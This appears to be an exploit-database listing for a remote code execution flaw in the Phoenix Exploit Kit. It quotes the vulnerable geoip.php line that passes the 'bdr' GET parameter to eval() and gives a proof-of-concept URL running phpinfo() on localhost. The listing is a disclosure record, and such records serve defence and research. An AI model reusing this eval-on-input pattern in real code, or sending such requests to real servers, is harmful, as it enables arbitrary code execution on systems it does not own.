header-logo
Suggest Exploit
vendor:
Phoenix Exploit Kit
by:
CrashBandicot @DosPerl
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Phoenix Exploit Kit
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MSWin32
2016

Phoenix Exploit Kit – Remote Code Execution

The Phoenix Exploit Kit is vulnerable to a Remote Code Execution vulnerability due to the lack of proper input validation. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious payload in the 'bdr' parameter to the vulnerable geoip.php file. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be implemented to prevent malicious payloads from being executed.
Source

Exploit-DB raw data:

# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
 
# Vuln file : geoip.php
 
492.  isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
 
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();

# Screen : http://i.imgur.com/E7RBBRk.png

__END__